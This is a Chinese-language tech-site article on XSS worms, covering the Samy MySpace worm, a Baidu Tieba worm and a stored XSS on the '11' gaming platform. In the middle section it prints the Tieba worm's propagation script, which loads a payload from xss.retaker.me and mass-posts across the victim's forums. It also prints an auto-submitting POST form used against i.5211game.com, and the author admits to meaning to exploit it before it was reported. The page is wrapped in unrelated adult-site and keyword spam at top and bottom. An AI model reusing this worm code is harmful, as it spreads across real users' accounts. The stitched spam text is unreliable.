成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

蠕蟲來了!小議xss worm的前世今生

安全
日前,百度貼吧爆發(fā)了一次xss 蠕蟲,這個(gè)蟲子幾乎把整個(gè)貼吧都爬了一遍。xss worm到底是一個(gè)什么樣的技術(shù)?今天就乘著度娘爆發(fā)的小蟲子,看看xss worm的前世今生。

日前,百度貼吧爆發(fā)了一次xss 蠕蟲,這個(gè)蟲子幾乎把整個(gè)貼吧都爬了一遍。xss worm到底是一個(gè)什么樣的技術(shù)?今天就乘著度娘爆發(fā)的小蟲子,看看xss worm的前世今生。

一、世界上的第一條xss 蟲子

在2005年10月初,第一只Web 2.0蠕蟲I-Worm/JS.Sammy也是利用著名網(wǎng)絡(luò)社區(qū)MySpace.com的系統(tǒng)漏洞,以跨站腳本攻擊(XSS)的方式進(jìn)行傳播的Sammy 蠕蟲的作者在社區(qū)個(gè)人資料中插入病毒腳本,當(dāng)其他MySpace.com用戶查看他的資料時(shí),病毒腳本就會運(yùn)行,自動把病毒作者加為好友,同時(shí)病毒本身也 會被復(fù)制到瀏覽者的個(gè)人資料里面。不到20個(gè)小時(shí),就有超過100萬MySpace.com用戶受到感染,造成網(wǎng)站一度癱瘓。MySpace.com為此 不得不禁止所有用戶在個(gè)人資料中加入任何腳本程序。

——from《web2.0網(wǎng)站安全思考》

這是世界上的第一條xss蟲子,不像以前的蠕蟲,只要是在MySpace.com這個(gè)域網(wǎng)絡(luò)社區(qū)為平臺,無論前端用戶的計(jì)算機(jī)是什么系統(tǒng),只要瀏覽器執(zhí)行,那用戶即可能被感染,

其后國內(nèi)也爆發(fā)過一陣,飯否、百度空間、渣浪,都有過被蟲子蠕動的經(jīng)歷,其實(shí)可以看的出來,這些站點(diǎn)都有一個(gè)相同點(diǎn),他們的交互性很強(qiáng),一個(gè)用戶參與度高的站導(dǎo)致了用戶對頁面的操作權(quán)限很高,蟲子也就通過這一點(diǎn)爆發(fā)。它滿足病毒的性質(zhì),在web上通過HTTP請求各種傳播,利用客戶端執(zhí)行一些惡意javascript腳本。

[1]對使用者的數(shù)據(jù)具有操作權(quán)限

[2]也可以對網(wǎng)站造成阻止服務(wù)攻擊(我不習(xí)慣說拒絕服務(wù)攻擊,因?yàn)閐eny應(yīng)該翻譯為組織,拒絕是雙方行為,而攻擊發(fā)生并不是受害方主動拒絕,而是對其服務(wù)進(jìn)行阻止,對這個(gè)名稱不服的請來辯!)

[3]邪惡的傳播網(wǎng)馬,比如通過ActiveX控件進(jìn)行本地攻擊(這個(gè)控件我就不太想吐槽了,之前在我空間里發(fā)過一個(gè)利用該控件進(jìn)行本地溢出的。。。不多說,蛋疼),因?yàn)閣orm的傳播速度本來就快的飛起,網(wǎng)馬結(jié)合后造成的攻擊力,我想應(yīng)該是成噸的傷害。

二、度娘的worm

  1. var forumName = [];  
  2. var forumId = [];  
  3. for (var i = 0j = 0; i <PageData.user.user_forum_list.info.length; i++) { if (PageData.user.user_forum_list.info[i].user_level > 3) {  
  4. if (PageData.user.user_forum_list.info[i].forum_name!=”璐村惂鐩戞帶”) {  
  5. forumName[j] = PageData.user.user_forum_list.info[i].forum_name;  
  6. forumId[j] = PageData.user.user_forum_list.info[i].id;  
  7.  
  8. j++;  
  9. }  
  10. }  
  11. }  
  12. function madeit(myKw, myFid) {  
  13. var c = rich_postor._getData();  
  14. c.content=”\\u8bf7\\u5141\\u8bb8\\u6211\\u505a\\u4e00\\u4e2a\\u5fe7\\u4f24\\u7684\\u8868\\u60c5\\uff0c\\u662f\\u5fe7\\u4f24\\u54e6\\uff01″;  
  15. cc.ftid = c.fid;  
  16. c.ptid = “2337372175″;  
  17. c.title = ‘\\u70b9\\u8fdb\\u6765\\u6709..”,a:$.getScript(\\’//xss.retaker.me/1.js\\’),a:”‘;  
  18. c.fid = myFid;  
  19. c.kw = myKw;  
  20. $.post(“/relay/commit”, c);  
  21. }  
  22. //now begin!  
  23. for (j = 0; j < forumName.length; j++) {  
  24. setTimeout(“madeit(‘” + forumName[j] + “‘,’” + forumId[j] + “‘)”, 1500 * j);  
  25.  
  26. }  

這就是造成那個(gè)蟲子的腳本,度娘響應(yīng)還是快的,刪貼神馬的,不過最終停止是這個(gè)第三方j(luò)s失效,截圖如下:

 

123321

 

可以看到,影響蠻大的,這個(gè)蟲子的行為是:一個(gè)用戶中招后,就會在所有該用戶收藏的貼吧中發(fā)帖,其傳播速度可想而知了

第三方j(luò)s的地址為:http://xss.retaker.me/1.js(現(xiàn)已失效)

在爆發(fā)時(shí)有個(gè)臨時(shí)解決方案,即:在C:\Windows\System32\drivers\etc\hosts用記事本打開,添加127.0.0.1 xss.retaker.me

其實(shí)更覺得這位小哥像是在測試,然后就一不小心爆發(fā)了...(好吧,我還是太善良了)

除了本次事件外,在08年的度娘也爆發(fā)過一次

三、11平臺的蟲子

其實(shí)也不算是真正的xss worm,只是傳播類似,好像是去年我才開學(xué)吧,我當(dāng)時(shí)才學(xué)習(xí)前端安全不久(一直玩滲透,前端安全也是當(dāng)工具用~)新浪微博好像是就挖出一個(gè)潛在的蟲子,是個(gè)持久性的xss,在個(gè)人設(shè)置中個(gè)人資料填寫存在持久性xss,當(dāng)鼠標(biāo)停留在用戶id時(shí),即觸發(fā)xss攻擊

寫一個(gè)post請求

<form accept-charset="utf-8" onsubmit="document.charset='utf-8';document.getElementById('intro').value = decodeURIComponent(document.getElementById('intro').value);" name="form" method="post" action="http://i.5211game.com/request/" target="_self" >
 <input name="method" type="text" value="publish">
 <input name="tag" type="text" value="">
 <input name="pic" type="text" value="">
 <input name="content" value="么么噠~@測試id">
 <input name="tx" type="text" value="0">
 <input name="sina" type="text" value="0">
 <input name="lastId" type="text" value="2522856">
 <input name="oldId" type="text" value="2514419">
        <input name="lasttime" type="text" value="1343530565579">
        <input name="tp" type="text" value="phrase">
 <input name="submit" type="image" src="http://xxxxxxxxxx" value="11111" onclick="submit()"/>
</form>
<script type="text/javascript">
document.form.submit();
</script>

行為如下:

自動提交post,只要有其他用戶在11社區(qū)鼠標(biāo)停留到該測試id,即觸發(fā)

比較操蛋的是當(dāng)時(shí)小規(guī)模測試成了,然后本來想留著多玩兩天的,被wooyun的一個(gè)同學(xué)提交了,我擦。。。

四、 小福利,應(yīng)該是沒公開的小漏洞奉上

這個(gè)洞也是我找的,也是11平臺(哈哈,我喜歡打dota),不過這個(gè)洞的位置在發(fā)布私信處,指哪兒打哪兒啊

 

123321

 

 

321123

 

好吧,差不多寫了這些。。。講的不好,我也就自己娛樂娛樂,重在科普

責(zé)任編輯:藍(lán)雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2016-09-02 09:14:26

2011-08-23 09:52:31

CSS

2014-07-30 10:55:27

2015-11-18 14:14:11

OPNFVNFV

2025-02-12 11:25:39

2014-07-21 12:57:25

諾基亞微軟裁員

2019-06-04 09:00:07

Jenkins X開源開發(fā)人員

2014-07-15 10:31:07

asyncawait

2016-12-29 18:21:01

2021-06-17 07:08:19

Tapablewebpack JavaScript

2016-12-29 13:34:04

阿爾法狗圍棋計(jì)算機(jī)

2013-05-23 16:23:42

Windows Azu微軟公有云

2012-05-18 16:54:21

FedoraFedora 17

2021-04-15 07:01:28

區(qū)塊鏈分布式DLT

2011-05-13 09:43:27

產(chǎn)品經(jīng)理PM

2015-06-11 11:10:09

對象存儲云存儲

2019-08-05 10:08:25

軟件操作系統(tǒng)程序員

2022-11-07 14:23:35

RPA人工智能流程自動化管理

2013-11-14 16:03:23

Android設(shè)計(jì)Android Des

2019-04-28 09:34:06

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 蜜桃在线一区二区三区 | 亚洲国产第一页 | 日韩视频在线播放 | 午夜影视网 | 国产精品永久免费 | 黄色片av| 国产在线视频一区二区 | 日韩视频观看 | 国产精品免费在线 | 一区二区视频 | 天天操夜夜操 | 天堂资源视频 | 欧美性久久 | 国产婷婷 | 国产成人精品一区二三区在线观看 | 毛片入口 | 丝袜美腿一区二区三区动态图 | 亚洲一区二区久久 | 国产激情一区二区三区 | 欧美成人免费电影 | 一区二区视频在线 | 亚洲视频国产视频 | av在线免费观看不卡 | 国产日韩欧美一区二区 | 欧美视频第二页 | 久久精品91久久久久久再现 | 九九热精品视频 | 天天爽夜夜操 | 性欧美精品一区二区三区在线播放 | 日韩在线精品 | 香蕉久久久久久 | 亚洲欧洲一区 | 一级黄色在线 | 亚洲成av人片在线观看 | 国产精品久久久久久久久久免费 | 国产精品成人一区二区三区 | 在线观看视频中文字幕 | 亚洲精品中文在线观看 | 日本一区二区在线视频 | 亚洲精品久久久久中文字幕二区 | 91视频.|